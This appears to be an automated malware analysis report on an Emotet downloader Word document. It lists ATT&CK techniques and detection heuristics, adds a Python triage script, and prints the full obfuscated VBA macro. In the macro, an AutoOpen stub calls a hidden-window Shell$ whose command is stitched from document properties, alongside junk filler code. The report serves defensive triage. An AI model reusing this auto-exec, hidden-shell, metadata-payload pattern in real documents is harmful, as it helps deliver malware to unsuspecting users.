Verdict: MALICIOUS (risk score 210)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1204.002 User Execution: Malicious File
ClamAV identifies the sample with the signature Doc.Downloader.Emotet-6344335-3, i.e. an Emotet downloader document. Static heuristics confirm a VBA project with an AutoOpen entry point (Sub autoopen) that does nothing but call one function, BtcNawFuYna, which invokes VBA.Shell$ with a hidden window (window style 0). The command string passed to Shell$ is built by concatenating a dozen variables with two document properties, ActiveDocument.CustomDocumentProperties("sVUTrmdRcM") and ActiveDocument.BuiltInDocumentProperties("Comments"). In the extracted source shown below none of those variables is ever assigned, and under On Error Resume Next an unassigned Variant concatenates as an empty string, so the actual command line is carried in the document's property metadata rather than in the macro text; this is consistent with the PowerShell reference (SC_STR_POWERSHELL) being found in the file but not in the macro source. The remaining procedures are filler: arithmetic and loops over undefined variables that are not reached from autoopen. The document's purpose is to download and execute a further malware stage; dumping the two document properties is the next step for recovering the PowerShell command and its download URL.
Heuristics (7)

- ClamAV detection [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]. Matched line in script (truncated by the report):
  On Error Resume Next VBA.Shell$ "" + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + ActiveDocument.CustomDocumentProperties("sVUTrmdRcM") + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + ActiveDocument.BuiltInDocumentProperties("Comments") + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + ActiveDocument.BuiltInDocumentProperties("Comments") + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcw … End Function
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched line in script:
  Sub autoopen() BtcNawFuYna
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this is the rule's generic description; for this sample a VBA project was in fact recovered (macros.bas below), so the marker corroborates the AutoOpen finding rather than standing on its own.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that any Office document containing drawing markup references; it is not a download location or an indicator of compromise.
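The triage the summary describes, as an added Python example that is not part of this report or of the analyzer's own code: it finds the auto-exec entry points in extracted VBA source, walks the call graph so the filler procedures that are never reached can be set aside, pulls the argument expression out of any Shell call on the live path, lists the document properties that expression reads, and resolves the concatenation against a property map the way VBA would with unassigned (Empty) variables. The macro excerpt is a constructed, shortened stand-in modelled on the macros.bas preview below (the identifier and property names are taken from its Shell$ line), and the two property values are constructed placeholders, not the sample's real contents.

```python
"""Added example: triage of a property-backed Shell() macro. Not the report's
or the analyzer's code; the macro excerpt and property values are constructed."""
import re

AUTOEXEC = {"autoopen", "auto_open", "document_open", "autoexec",
            "autoclose", "auto_close", "document_close"}

# Constructed excerpt modelled on the sample: a filler Sub nobody calls, the
# autoopen stub, and the function that builds the Shell command.
MACRO_SRC = r'''
Sub oNXCI253n()
On Error Resume Next
SCoP0E0 = Rnd(8)
End Sub
Sub autoopen()
BtcNawFuYna
End Sub
Public Function BtcNawFuYna()
On Error Resume Next
VBA.Shell$ "" + CFacgbuM + ActiveDocument.CustomDocumentProperties("sVUTrmdRcM") + veTmDPxBBb + ActiveDocument.BuiltInDocumentProperties("Comments") + XndxnUNtPe, 0
End Function
'''

# Constructed placeholder values; the sample's real property contents are not on the page.
DOC_PROPS = {
    ("custom", "sVUTrmdRcM"): 'powershell -w hidden -c "',
    ("builtin", "Comments"): 'Write-Output constructed-sample"',
}

PROC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\([^)]*\)\s*$'
    r'(.*?)^\s*End\s+(?:Sub|Function)\s*$', re.S | re.M | re.I)
# Argument expression of a Shell call, minus the trailing window-style argument.
SHELL_RE = re.compile(r'\bShell\$?\s+(.*?)\s*(?:,\s*\w+)?\s*$', re.I | re.M)
# Operands of the concatenation; '+' and '&' are skipped, so both read as "join".
TOKEN_RE = re.compile(
    r'"((?:[^"]|"")*)"'                                                # string literal
    r'|ActiveDocument\.(Custom|BuiltIn)DocumentProperties\("([^"]+)"\)'  # property read
    r'|([A-Za-z_]\w*)', re.I)                                          # bare identifier
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*"((?:[^"]|"")*)"\s*$', re.M)


def parse_procedures(src):
    """Map lower-cased procedure name -> body text."""
    return {m.group(1).lower(): m.group(2) for m in PROC_RE.finditer(src)}


def reachable(procs, entry):
    """Procedures reachable from entry; a body mentioning a name counts as a call."""
    seen, todo = set(), [entry.lower()]
    while todo:
        cur = todo.pop()
        if cur in seen or cur not in procs:
            continue
        seen.add(cur)
        words = {w.lower() for w in re.findall(r"[A-Za-z_]\w*", procs[cur])}
        todo.extend(name for name in procs if name in words)
    return seen


def shell_expressions(procs, live):
    """Argument expression of every Shell call inside the live procedures."""
    return [m.group(1) for name in sorted(live)
            for m in SHELL_RE.finditer(procs[name])]


def resolve(expr, procs, live, doc_props):
    """Return (command, properties_read, unresolved_identifiers).

    Identifiers with no string assignment in a live procedure are treated as
    Empty, which VBA concatenates as ""; the On Error Resume Next at the top
    of each procedure would swallow any error that did arise."""
    assigned = {}
    for name in live:
        assigned.update({k.lower(): v.replace('""', '"')
                         for k, v in ASSIGN_RE.findall(procs[name])})
    out, props, unresolved = [], [], []
    for lit, kind, prop, ident in TOKEN_RE.findall(expr):
        if kind:
            props.append((kind.lower(), prop))
            out.append(doc_props.get((kind.lower(), prop), ""))
        elif ident:
            if ident.lower() in assigned:
                out.append(assigned[ident.lower()])
            else:
                unresolved.append(ident)
        else:
            out.append(lit.replace('""', '"'))
    return "".join(out), props, unresolved


def triage(src, doc_props):
    """Entry points, live vs. dead procedures, and every resolved Shell command."""
    procs = parse_procedures(src)
    entries = sorted(n for n in procs if n in AUTOEXEC)
    live = set()
    for entry in entries:
        live |= reachable(procs, entry)
    commands = [resolve(x, procs, live, doc_props) for x in shell_expressions(procs, live)]
    return {"entry_points": entries, "live": sorted(live),
            "dead": sorted(set(procs) - live), "commands": commands}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(MACRO_SRC, DOC_PROPS), indent=2))
```

On the real macros.bas the live set is just autoopen and BtcNawFuYna, every other procedure lands in the dead list, and the resolved command reduces to the two property values joined together, with the unresolved list naming the variables that would need an assignment before the command could contain anything else. The property values themselves have to come from the document (olevba's metadata output or the OLE SummaryInformation and DocumentSummaryInformation streams); the resolver only shows which ones to pull and how they are stitched together.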
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13639 bytes | 785c26dbaa5a7dcf4dbc137d22f19a8949eeedf16506ffd470d7dcec37e64146 |

Preview of macros.bas: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub oNXCI253n()
On Error Resume Next
Set Ntd = rHGTN
Do
SCoP0E0 = Rnd(8)
gTFS4ze1 = ucAiX8RT4 + vJXR * 47 - CDbl(CixUh2) + 85860524 + CSng(489878376 - CBool(5406) + 83 / Cos(7104)) + (145 + harrH3 - lgDT + Cos(91) * (xClRS916 - Rnd(1) / 6636 * Fix(GlMU3Ofv)))
For uciF4Lf = 6 To 890
FrUc = (1 / vKv / 435082536 - CLng(LdigP0) / (ijYX8f + CBool(22606395)))
Next
REuK9 = 316094851 / 22547177
For Each Ombqk9c9d In IwaS
CkHzp = Cos(271833541)
Next
For YAU = quW To dRmc7T
QRH = 98 - CBool(51 - CByte(1651) - NqgB - CBool(2 * Round(7310) - AJYgRj0 * 665)) / 343221840 * Tan(5914 / XqTL7rlw5) * 5181 - CDbl(88) + AzCC42 * CDbl(7691) * 169744011 / 1050
Next
Loop Until NPnU9 > gbtqyBC
End Sub
Sub aDiBxqR9()
On Error Resume Next
Select Case UmQs
Case 307494170
syjuem1 = Sqr(XqWh8Gfy * CInt(63903196) - QqDeQlI15 / 869)
WhXr = Cos(760)
Case 9
QYYN2 = Int(uxt + Round(DSXi3M))
fDLW1 = 2
End Select
Qeud976E2 = CTR * OmNN7o
For Each ePUaM In FqGL6
hmY = BAnYr213g + 166436589
Dim tYLS()
ReDim tYLS(2)
tYLS(0) = 678
tYLS(1) = 52
If qMh <> 17 Then
oxIS5 = 501
End If
MrhjS = 254 + Fix(JvWb90) + MAbg0 / Atn(NIdP - JMeIcAt / 428421522 * wdWl2g8o8) / (pLRu8 / CStr(488) / 3 + Sqr(CTRv220 - Fix(8) * 355 / Log(ZUvkXvG)))
Set MDVF = heZa555T3
Next
End Sub
Sub NStz5F7()
On Error Resume Next
While TgwW9aQ >= 66
While GqEtjg7q3 Eqv 8363
Qujn67 = Round(capffqGpu * usQ)
Wend
kwqd7 = (668 + dxZcycY56 + 3100 * Oct(mhYr4 - ChrW(HBevPHn5)) - RXQPn / SUZL)
Set ewto8 = rASG451
Wend
If lSTGb1 <= mgyJg44 Then
If xEpi > 6 Then
fmINgQW = 169
End If
Select Case GjTT77X
Case 350111050
QOshD07r = CByte(92)
xsBm165 = 289
Case 4130
BDBD6 = kKe
AzVD43 = Fix(zlGK - Hex(ENb))
End Select
Else
knHA51 = MGptR87 - KVbnbH
Set Ziu = YysF4BF4
End If
For Each DPSVUoxd In vCRSDT8X
RMe = XJoIKP3f1 + 253138988
Dim RpZ(6765, 182)
Do While WKQL1W <= utNR6907
dENDL6 = CLng(kxKG02Pi6 - TVdAr31u)
Loop
WfAO6 = 211759300 * SaRhy
xFoa5Ln = Tan(8)
For Each KFYb2Evt In podQ7SaX
OxIS5h6w2 = (9914 + Hex(pAw - Sqr(ZrLo * CDbl(vlWqW82))) / (SQpOzF / CByte(IswlC) - YeZG87WSn * 20 / kli - xesq129C5 * Qngp3o - iHeiJj5EZ * (599 * CDbl(354))))
Next
Next
End Sub
Sub AHFXb(nVxp7z)
On Error Resume Next
Do
Do
cxAY454 = ylud6TX76 * Fix(GRZe3eG) + KrjF - wuqh - 344077735 - Cos(1) - bfVeM5 * AANNV * 8907 + Oct(79)
Loop Until aywtka Or uJbu8b
Do While pAPq = uiA
kjGj9 = RcRpJ50W
Loop
Loop Until EQihK943H >= jdqM6u72h
If LTP And zDTs95jo Then
Do
ZVMaQ = gpVStZY + CDbl(5694 / Fix(2674)) + 969 / qtU / (29029482 / CInt(369170378) / IeS + PpQG * 2930 * NbJf9q4 * VuiP1d9o + QMxF5a)
Loop Until fwHu1 = MfPe
ynnq537 = 328571239 * 270959438
Else
Do
WZLdTk = (FEyKr32R9 + Sin(7)) / fRecn459 - 764 + QNH + 1 / AIB + CSng(179213886 - 177755595)
Loop Until qCna Or itsrF2r
Do While ZEMe6zyV5 Or pZx
cICK43472 = 6153
Loop
End If
For pLrj79 = 9845 To 16372676
Dim EKrr6()
ReDim EKrr6(2)
EKrr6(0) = 19
EKrr6(1) = 35586319
iAsG2A = NJeLEA5X7 - Elqw61O
DOX = sjdkP * 85 * bpTg125 + Chr(3 * Hex(6036) / jbBE3Qj9w - CStr(SrD)) * (41 / Sgn(14 / ChrW(hhwppnvc3) - 990 * Sqr(6 + CSng(2866 / Sin(XAAp) - 53 * 6244) - 253089492 - 164172741)) + 965 / Round(920))
itgW77838 = 13 * CInt(32 + 65847274) / nfbc * Atn(EhhIo) * 361 + CDate(ottEpp3)
KgMV = MTO * Int(7) * 63 - Sqr(1526) - WLSZ - Sgn(rofjh288s + Fix(Gjm + Hex(9237761) * 395 + Sqr(zgNVr0p37))) * 403723965 - Int(3437 - CDbl(8 + ChrW(471125614))) + (FHvH / 1 / Sda / Hex(578))
Set Jwv = YrxB364
Next
End Sub
Sub autoopen()
BtcNawFuYna
End Sub
Sub NwQw(JYgxS37)
On Error Resume Next
While ljwGPg8wj Or uPYU0uN
If zvTqj Or edOsi5x Then
SxslO9 = Rnd(450)
End If
For Each bBEh8g3l In zRJy90G
etfs41 = AQgc30O4 - CLng(30) * 304679274 + Log(ttTAp - 3 + 1191 / Hex(sIih))
Next
Do
Ukzcf866 = (XTel5J35 / Fix(5012 + Log(CFQE4I1) + 18 / Tan(ILfyCj35A)) / WkJGl641T - CDate(5064 - Hex(dzLpU4C) - jnmOWd7 / CDbl(613)) * (mvJ / Hex(mMqG8o05 - CInt(rfAx) / 7 + Oct(2)) - 1635 / CDbl(3) - 7759 + zdyhdCZ9))
Loop Until jIX And OIUH8
Select Case QGyrA
Case 47
fgFs01zh = UsoJ67H
oiQFz = 301
kuCGF36G4 = Oct(kdJM8)
Case 83
NbRxN = 961
HxEzWW = ChrB(9495)
OEvG36miW = PqAf7
Case 811
QUdY2N4F = CByte(84280187 / CLng(CzzV9wPE - ChrB(96)) * 528674950 + CSng(CwfUt))
taIlH7 = Oct(621)
SJsv3sG = ChrB(5476)
End Select
UkyDqv = 209138705 * 336955206
Wend
For Each KcPVoC26y In pYZDepkH2
For qBH = Byp To ItZu3NUzm
LZS = 64 / ChrB(501) - HtIo + Sgn(38) - (236614926 / 887)
Next
Do While WkN Eqv vdn
wbLN = (5 + xyMLBF6 / 799 * Tan(244952897) - (4340 / CDate(183612180) + DdFVK - 3 + RuL - Atn(4943 / CInt(267668729) - 95 / HcHl) - mqXU / Sin(53)))
Loop
Do
UmQvbQ1 = 9206 - 7 - TmNe4BS - ChrW(gkIE0D) + 9 / Tan(662 + fNcE2 / 2474 - Chr(ovk)) + hHlh / YHW - 25 * CBool(80 * 24411686) + 65 / Log(EMGc5 / Hex(Xqt) + bWRyjcr22 / 39) - QLEUc530z - Cos(IGIe5)
Loop Until HuSY75 > WMwNJ
Set OPQR9 = 36
While RHcJHE4 And 6
ZCTg80C2 = Sqr(8)
Wend
Next
If NaRU = 14 Then
If Yly < ban Then
LExA0nD = ChrW(sEL + Mjgg0)
End If
Do While XjkU21R Or 9
NyDM50 = Tan(355986079)
Loop
ElseIf Zqx >= Kusl3 Then
For IxuBJw10v = 116762295 To 238172867
IWsR = ChrW(535993604)
Next
For Each DKkWv In bCR
iOWM438X9 = AdJUWnK / MCWHBb3 - NgQTp5 / CInt(lRGi44XAU) + (47 - Atn(qUED / owcli88) * 4 - fDZn / 503 + Sqr(MKUJ - Sin(3151) - 430 + ChrB(INJ + Sin(rirp2l32 / Atn(466971471 * Atn(6987)) + 236 + Int(blD)) / rGoC43x9 * BQJd4K4KL)) - PpIa * Int(1239 / CInt(mMLU) + swBx6v75v + CInt(pcDCIV0ft / 507)))
Next
End If
End Sub
Sub XDY(jnYT8o)
On Error Resume Next
If ZoVK7526P >= KBMq90 Then
If zuSH Xor bKlpAYaN Then
zgLGuJP = 37114734
End If
mZkw16 = DgVs / BFZw8iWq - (3457 - EYav523 / 756 + CBool(64)) / HOBQ27C6 / 559 + gjFJiPXW0 / 8
Else
Do
ZRaIkfd4 = (8611 * CDbl(RkyB))
Loop Until qpMG8E577 And elmhJG0S
For Each xNuf In gILp528R7
wtUEk6p = 2064 - xBrhy / GuFUK + Oct(qPdml65) + LBCc4i + udB * 64 + XEVL71O
Next
End If
NQFB4 = 398996837 - LLBcsA
End Sub
Sub JSjM466o()
On Error Resume Next
QGSCe = 528590497 * 73959313
For gHcu6 = 402 To IBP
For Each KvxI1h9 In JFx
idIYU33R9 = Hex(DIbZ)
Next
While jfON <> RkJu0Y3
VQN = Chr(12)
Wend
Dim RrqF85(857)
Do
UawS44 = CDate(Mpmse8e)
Loop Until QVyL1vh9 <= 7
If pjrY Or WoeU301 Then
BrKpb8 = Int(3 / Int(wqSdqF) + SqkD52 / 104713059)
End If
For Each ZfZN8 In yuP
QJBYs695N = 283842145 - Sin(NzWI0291) * 8760 * CStr(5506) * 24 - CByte(6 - Cos(qoKW422j + 1873 * 394342793 + Cos(zpA - Chr(5140))))
Next
Next
End Sub
Sub TyrdRo7()
On Error Resume Next
Select Case WOmeVyG4
Case 11
mWYTk3 = CInt(LTjy64Q)
aKqp9803 = MSPD
qBdTg2 = CStr(rrdli6A - Hex(fQZ) * QfTe7uO2 - Chr(72))
Case 355
UNjK = Cos(86 - IKH)
UssQRI = Hex(68 / 940 + Uxzf * 63)
XBqp = Round(13765379)
Case 6
VTJPv3 = CDate(uQWG44K7 * Chr(9544))
URr = Round(4)
LfXSO2 = CByte(Wtno + Round(72 / Rnd(31)))
End Select
Set iROw4P9jP = ZcJ
End Sub
Public Function BtcNawFuYna()
On Error Resume Next
VBA.Shell$ "" + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + ActiveDocument.CustomDocumentProperties("sVUTrmdRcM") + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + ActiveDocument.BuiltInDocumentProperties("Comments") + CFacgbuM + veTmDPxBBb + zwXWMFF + RczZgzVVR + vbCHyBnvTf + XxPSCDdbT + tvudZgcww + gFSxPkkEk + PFETVNPNWdT + yhXMtYVRwmM + ADmXMHbLhRD + TLaXwSV + XndxnUNtPe, 0
End Function
Sub GNcB41(JcY)
On Error Resume Next
If IPox >= Pwbzk Then
Select Case YANq0
Case 368
RAPrzha = 47
xXa = Atn(332)
Case 2432
zxmf = eQm
faN = Int(4)
Case 352144935
ZyLb8C = Tan(DYDdFQ16)
bAWs = CSng(Rpevy)
End Select
Select Case dyIpR
Case 264
mgCC8 = ozhGwwP98
Trra = GqvO7740
fqpw6 = 70
Case 55
hyAh = CInt(297)
VrLLI50 = Chr(aWDPJ3PEY)
AHlgz8q7 = Tan(mXjSr * 470150377 + 36 + Cos(sMXjz3i))
Case 344054156
PwV = bvuHP
jbfdnRdq0 = GuwS3o1
qCjfw6 = Sgn(8935)
End Select
Else
vstu24xd = Atn(79)
XozA = 294175563 + qpNomFf1m
End If
For Each WKvwDt0 In SulI35
Set cWAC = tsK
Do
KGqx = pAYuy
Loop Until RvcJC Eqv XYk
For Each sLK In Bovu
OHHlt1C4H = yYoVokd4H * Atn(70 / Log(5 / 9 + IURT2QvCx / Cos(EHAJ / Chr(jgPB2R6I)))) + 407 / Sin(moib) / 978 + TEakQ327 / 170462501 / CStr(HMinY2oX) - qUX * Oct(6)
Next
If wtVr6666r >= mewpju09 Then
sZxY46 = CSng(QCBB)
End If
Next
End Sub
Sub TCNa(kfoJE9y3)
On Error Resume Next
While IJbB6M0VK < 46
While XXWO02Q1 = aTeVfQ
yvNK7328F = pBnQ08 - Oct(8442) / 7 - 832 + QNcgN39 + ChrB(8 - Sqr(ZuXW8 - 456 + 86 / JTch58) + 5605 * 90) * imlL7Fr - Round(1) / 8929 + 5 - oWlWEG - CDate(naXtH98tP) * (MpdW9 + Sin(72) - evQO8p - pBque7m)
Wend
uhE = CTtk - 195347364
alqq69 = (zCTWU8 / ChrB(icUH6x8) + 255 / Sqr(eaC) / HwYot4a2 + CByte(508894376) * 763 / Cos(6) / (172089548 + Chr(nTT)))
Select Case eMygYl3F7
Case 35
DucQ = gzhP31K
lRcd162 = CDbl(LrZmM121C)
fWEB331 = Sgn(8)
Case 47
WTgu03D35 = sNCH2hCvH
HQtH = rWEc13P2
gisnh1Po = CSng(CRelcZG6L)
End Select
Wend
For GhL = 5 To 23
If tmIQ1r And DFuO Then
Xxj = Sgn(274868601)
End If
Do While yHRW3 And dQrV
OCHr38s6 = WsdnvT / ChrW(RmB - 155715744 - 8 - 6755) / 4977 * Fix(80 - Cos(hHq + Chr(xRyS4) / UeQM7W3V / Sqr(82)) + CkAp4Kp6X - ChrB(6052 - CLng(87) / zKQk0 * Chr(19))) - 5425 / CByte(488214058) + AyRdoZ6 - 8761 + 77 + 6
Loop
qrOosSl = zfao96rN4 - GLzLm11zx
Next
End Sub
Sub Jbc(HCaW)
On Error Resume Next
Do
Set Hhdfd19 = 86
For Each MHIfhj In thPY44tm
ippb9 = (YDLP0OM * 7 / HiB + Rnd(6026 + CByte(3703)) - axYGtE9LO - Fix(363))
Next
Loop Until pPTN3y84a Eqv MCjD9o
For TvCwt6h86 = RlvU To 5984
Do While moNDB7 And oDhOL
saDkUu = edPG5boX - 6339 - 412237500 - Cos(fVUx9) - Qmaw / 9 + 455 - CByte(LRqb1B - Hex(6818 * Int(1802)) * 7 / Log(8)) * kXqw / CBool(71) * TIy * Rnd(ugNjkVe31)
Loop
If HZjR And xELQ95j63 Then
HGyJUe7 = 1
End If
Set kroW = 4047
While ZFfV3775 Xor XYiaZ8
hgkId3425 = 63
Wend
Next
While Hsmgi68 Or bWtr5
Select Case BcSM0C
Case 6
ZdKn06qW2 = CStr(47)
PesO3w = 3138
Case 6168
KgPa = AHwtbn4ld
DrYiJ = Rnd(NjYs030)
Case 782
zpM = rNRZ2
AeLM822 = CInt(3)
End Select
Dim Cuuh3rYPS(1778)
Do While HujtyY9 = 5
kOyyzC4 = 485377209
Loop
Do
URIRY = (lVZw + Chr(3169) / uulbuKpU - CBool(eYwe2) * CIMff / Round(1 / CStr(123550634 / CBool(cCJi41id) + 3621 * CByte(133457821)) - 42766565 + kka))
Loop Until yhmoT >= bxJt
tvvc0 = 522583508 / bTql
Wend
End Sub
Sub WqoDwzL51()
On Error Resume Next
While mWIxC5Q > 2
Set iHgu55hN = 673
While KZeMpP Xor sDsByK
Ffc = 27546976 - Sin(9525 / CLng(UPdNJqL) + 1 * CDbl(379481809)) / GVA * CDbl(55) * XLV - Sin(TDdUdL) + zDzBc * Rnd(emm) * IxxU6 + 1 / 3 * 7488 + gXmCqphG4 * eaVdYNAb
Wend
goav4gn = CStr(137455459)
Wend
Do While RtfRCR > REqgOnJL
CRFB4 = (16 / 390702212 - 494249700 * RTKu5Nj + 7 * VQqj6 + nxoX4Og0 * VNjPO7u - 18 + Int(ChZc2z) / meY + Atn(182))
Set lDC = fJZt5B
Loop
End Sub